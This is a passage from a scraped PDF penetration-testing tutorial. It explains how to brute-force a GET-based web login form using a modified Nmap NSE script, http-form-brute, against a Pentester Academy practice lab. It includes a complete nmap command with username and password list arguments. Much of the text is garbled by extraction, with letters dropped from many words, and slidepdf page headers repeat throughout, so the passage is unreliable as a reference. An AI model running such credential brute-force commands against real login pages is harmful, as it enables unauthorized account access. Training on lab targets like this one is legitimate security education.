Paload Geeato ta, hee apat fo doig oiatio ad peutatio geeatio, a
variety of possible payload generation could be done which includes Block payload generation,
credit card payload generation, username generation which could be taken for the
eueatio pat ad ueial paload geeatio:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 48/58
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 49/58
Web Application Exploitation with Shritam Bhowmick 49
improvements to the Nmap Project. Nmap is both available for Linux, as well as for Windows. It
also works with Mac but with various lags in speed. Benchmarks proves Nmap is slower in Mac
rather than on Linux based operating system. There is a whole documentation available on
Nmap and how to use it which could be found here. Hees a book Fodo hiself o Nap.
In case anyone needs a very thorough understanding of Nmap, follow the book. If you need this
only for penetration testing task or as a tool-set fo uik dit petest ased out of etok,mail me at [email protected] ad thees a ogoig eseah document which I
had been preparing.
Nap a sa fo ope pots. Ca detet host opeatig sste eotel. It also a detet
application versions, and has signatures preset for recognizing application, OS and other
daemon versions. It does host discovery, operating system enumeration, and report generation
using XML standards and firewall evasion on the go. It has both CLI and GUI versions. The GUI
esio of Nap is ko as )eap. Whe its saig ad etok eueatio,
fingerprinting, Nmap is the first favorite choice of any dedicated red team using this tool as an
army Swiss knife (same goes for Netcat!).
Nmap has an engine called Nmap Scripting Engine (NSE). The engine is documented here and is
written in Lua language. Apart from Nmap itself, NSE provides the flexibility to separate
additional tasks like automating an exploit, actually exploiting a target and provides a range of
capabilities such as enumeration, vulnerability detection and much more. Read the
documentation. Also, in kali Linux, which has been an operating system based out of Debian, the
Nmap scripts resides in /usr/share/nmap/scripts directory:
Before we go into opting NSE engine to bruteforce web based form logins, there are certain
thigs hih oud eed to ko:
1. The NSE is completely community based and written in Lua.
2. As of 2014, August, there were no such scripts written in Nmap which assisted
utefoig e ased logis usig GET ethod.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 50/58
Web Application Exploitation with Shritam Bhowmick 50
3. I had to manually change code for Lua in the NSE file and implement into a current
okig sipt fo Nap hih as http-form-ute.se. Cedits to nnposte o
Nmap development.
4. B default, as of , August, this patiula sipt ol uses PO“T method and there
is o suppot fo GET ased e fo utefoe ad hee the ode eeds to emodified in order to support both methods.
5. This ode hih ill e doueted hee ist a pat of peetatio testig ad is
wholly devoted to scripting the NSE and then using this newly developed/modified Lua
ode sipt to idetif GET ased fo authetiatio ad assist utefoig the.
6.
The script will be covered here and this might be on patch release later and hence the
original script would require a backup before we use our own script in Lua making
modifications to the original code.
7.
NSE uses script arguments so there are different script arguments for different scripts.
The code which would be presented here adds yet another argument to the list apart
fo hat as oigiall offeed. Its eause the sipt poided suppot fo PO“T
ethod ad ot GET, so odifig the sipt to ou o eeds, I had to go ahead ad
add a additioal aguet set alled http-form-ute.ethod hih takes iput as a
GET o a PO“T to ake sue that the euest ethod is delaed efoe e stat
bruteforcing the target application.
8. The modified script itself is not stable as for now. It gives false positives which is
currently being worked against. But with several test, it showed 70% positives with the
tested methods above which proves that it could crack credentials. If the credentialsgenerated by this script goes wrong, trial and error is used against the application to get
the right credentials. Nmap developers are fixing this.
9. Update Nmap script database at a later time (with this revision after 2014) to make the
est usage. This is the fist ee doueted sipt ad a futioal oe fo the
attept e ae goig to ake. Dot fous o the sipt and move direct to the
petest pat if ou do ot udestad Lua o at ode oe.
Backing up the original script is easy, you would require to copy the existing original script and
store it in the same directory for later use:
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 51/58
Web Application Exploitation with Shritam Bhowmick 51
Now one would require to update the original script with the following code provided here. A
raw version could be found here. Since we had backed up our original script code for http-form-
brute.nse, we can go ahead and replace the original script code with the scrip code which has
been provided here because this new script provides new functionality including choice of
PO“T o a GET as a HTTP euest.
Copy the code from the raw version of the ASCII text code in Lua provided here and paste in to
the edito of hoie. Make sue the ae stas the sae that is http-form-ute.se. Aftepastig this e ode, CT‘L+O to sae the ode i ao ad hit aaige-etu i.e: Ete,
and then again CRTL+X to exit the editor. The following screenshot shows the demonstration of
the ode hih has ee deeloped usig ao as the tet edito of hoie. Fo e uses,
leafpad which comes Along with Kali user would be great, or gedit which could be installed via
apt-get istall gedit o oad lie.
Its eoeded fo epeieed Lua odes to go though the ode ad odif if a hages
are needed. This belongs in accordance to the needs of the pentester. Also mail me if there is
soethig ou odif, sie Id e iteested to keep tak of the hages i the ode.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 52/58
Web Application Exploitation with Shritam Bhowmick 52
Now that we have everything setup with the replaced code, we need to trigger Nmap from the
oad ad set up a afted Nap N“E sipt ith aguets. The sipt aguet is
something which most find tricky. Keeping everything aside, when you realize the way Nmap
scrip arguments are passed via the CLI, the true power lies there for quick exploitation as well as
quick tests. NSE provides a variety of lists for checks, exploitation, enumeration and a vast
dataase fo autoatig tasks. This douet agai does ot disuss Nap i detail, Id athe
jup oe to usig N“E fo utefoig e appliatio fos hih ight e GET ased
HTTP request. A GET euest is soethig hih is ipited o the U‘L, hih i this ase is:
https://pentesteracademylab.appspot.com/lab/webapp/1?email=test&password=test
Both, useae hih is eail paaete ad the passod, hih is passod paaete is
eig passed i lea tet o the U‘L hih eas the euest ethod is GET. This ould also
e eified usig the ie-soue hih as disussed ealie in this document.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 53/58
Web Application Exploitation with Shritam Bhowmick 53
Koig to tigge Nap ith -sC sith ad usig —sipt ith —script-ags. Thees a
diffeee uig the -sC sith ad tagetig a speifi appliatio usig a speifi N“E sipt.
The geeal -sC sith ill do a default sipt uoe, hih ould e euialet to —
sipt=default.
After application has been mapped, to use the power of the NSE script to our advantage, we
need a more specific script which we had developed earlier in the Lua code to be ran over by
Nap. I ode to aoplish this, e eed to tigge the sipt ith —sipt= dietie ad
etioig the sipt ae. Nap takes ae of the est ad autoatiall is sd ith the
/usr/share/nmap/ scripts directory and hence would not requie a .se etesios to e
poided he aig the sipt. Fist, the ai taget is speified alog ith the pot to e
targeted, web-see us o 8 default ad ou taget petesteaadela.appspot.o
have the same port open which serves web-content or which is running an HTTP server. Hencewe have more number of script arguments which are newly introduced from the script, these
are all the arguments one needs to pass to the script (http-brute-form.nse):
1. http-form-brute.hostname – Specifies the hostname.
2. http-form-brute.path – Specifies the path URI.
3. http-form-brute.method – “peifies the e o ethod.
4. http-form-brute.uservar – “peifies the ae of the fo field fo useae.
5. http-form-brute.passvar – Specifies the name of the fo field fo passod.
6. Userdb – The database of line feed usernames for bruteforce.
7. Passdb – The database of line feed passwords for bruteforce.
Hee these aguets ae supposed to e etioed i the afted ue fo Nap he —
script=http-form-ute ith —script-ags is delaed. All of the sipt ags ae ude .
Since we now understand the format to specify the Nmap arguments. I need to show some of
the common mistakes one could run when writing the query for Nmap. These are stated here so
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 54/58
Web Application Exploitation with Shritam Bhowmick 54
these mistakes could be dealt with no time and when the audience writes the query for the first
time, he/she feels confident enough. Some of the mentionable while write the script argument
queries are the following:
1. The –script=script-name-hee delaes the sipt a attake is usig. Hee its http-
form-brute and hence this would be –script=http-form-brute.
2. To specify specific arguments to the script which we require here, one needs to declare
the –script-args=aguet.speifis=alue,
aguet.speifis=alue hih the takes all the aguets ude
(single quotes) and within this singles quotes are the argument names like http.form-
brute.method, http-form-brute.path, http-form-brute.hostname and everything else. All
the argument names are separated by , (comma).
3.
The alues of the desied aguet aes ould e ude doule uotes as
shown above in point [2]. Apart from this, the userdb and the passdb in this scenario
takes the iput fo a file ad hee thee is o doule uotes. Although double
quotes could be provided.
4. Usig - sith efoe statig the sipt aalsis eas the attake doest at to
do a dns scan and hence stands same for –no-dns.
5. The -p sith etios the pot to e saed. I ated to sa pot 8 hih is a
speifi taget pot hih sees the e appliatio ad is ope. “o a –p80 will be
sufficient for the NSE script to go ahead and bruteforce that port and none else. I could
speif othe pots ia -p 8 ad oe.
6. As usual with Nmap, before everything else, the attacker must specify the target host if
not the whole URI. That is in this case before writing everything, mention the target host
pentesteracademylab.appspot.com fo Nap to stat, the the pot, the the o-dns
etioale ad the the sipt oe eeds to use hih i this ase is http-form-
ute ad the the sipt aguets.
7. Last but not the least, the attacker also for the convenience specifies the –vvv switch at
the last hih stads fo eta eosit. “igle ould had ee less eose,
ould e less eose opaed to , ad hee I speified he aiu leel of
verbosity which we can attain to go through the results while Nmap would be already
bruteforcing.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 55/58
Web Application Exploitation with Shritam Bhowmick 55
Tiggeig the Nap ith the afted ue fo the odified http-form-ute. I hae
mentioned which needed attention to go ahead and craft the query. After everything has been
clear, I go ahead and craft this following query for our modified version of the Nmap NSE script:
nmap pentesteracademylab.appspot.com -n -p80 --script=http-form-brute --script-args='http-
form-brute.path="/lab/webapp/1", http-form-brute.hostname="pentesteracademylab.appspot.com", http-form-brute.method="GET",
passdb="/root/Desktop/pentesteracademy/challenge1/passwords.txt",
userdb="/root/Desktop/pentesteracademy/challenge1/users.txt", http-form-
brute.passvar=password, http-form-brute.uservar=email' –vvv
The crafted query is simple unless one looks at its length. The Nmap takes the target host as
petesteaade.appspot.o ad ith a - sith I speified that e eed ot e-do dns
queries and hence no-dns follows; next I mention the target pot hih is 8 ad the I
etio the —script=http-form-ute hih is the odified sipt ude
/us/shae/ap/sipts/ dieto. I the etio the —script-ags= poig the sipt the
arguments which are required for the target separated by a comma and enclosed in singlequotes as discussed above. The values of these arguments are enclosed in double quotes. And I
then specify a verbose result while Nmap would be running, this is optional and is not required. I
however like to maintain the dignity of the results for a quicker look during a penetration test.
Everything would look like the following:
The oigial ue is attahed aoe. If ou eedt udestad hat its doig, I suggest
eadig this setio agai ad agai. Its ette than copying the query and pasting it over the
terminal for results. That would hamper everything which is being documented here. Apart from
it, when Nmap finishes, the results would be like the following:
1. It will go ahead and target the specified port.
2. It will load the Nmap script specified.
3. It will attempt to recognize the specified URI which the script mentions.
4. The usernames will be taken from userdb.
5.
The passwords will be taken from pasdb.
6. The fo aiales ill e take fo usea fo useae
7. The fo aiales ill e take fo passa fo passod
8. It ill adjust the edpoits ad GET ill e used to utefoe these edpoits.
9. Optionally one could also store the results in xml format.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 56/58
Web Application Exploitation with Shritam Bhowmick 56
The utefoe ill e takig tie sie its utefoe:
Depending on the network, it would take time to bring the results back, the results are varied
and hence may require trial and error. This happens due to packets being send either too low or
due to the time lags. False positives are common using the modified script.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 57/58
Web Application Exploitation with Shritam Bhowmick 57
As the audience sees the result, these are false positives which were caught in hook by the
modified Lua script, with some trial and error; one should be able to get the right credentials. As
this is getting documented here, Nmap developers are working on the current Lua script for
better detection. With a speed connection, the false positives are however minimized. This
happens due to the TCP packets being sent at low rate and therefore the response from the
web-server getting alfoed. Its due to etok ottleeks.
That marks the conclusion of this document and I hope the audience gets the vision how to
carry out different attacks via the same attack vector but with different approaches. The point
of this document is not to show how things are exploited and you get credentials; that could be
done either way. But the point is to show how many ways a pentester could go ahead and break
the web application to suit his/her objectives. This is a series of documents to follow.
8/10/2019 1. Web-Form Brute Force Methods-libre
http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 58/58
Web Application Exploitation with Shritam Bhowmick 58
Contact Information
LinkedIn: Contact me on LinkedIn here.
Facebook: Contact me on Facebook here.
Reach me at: [email protected]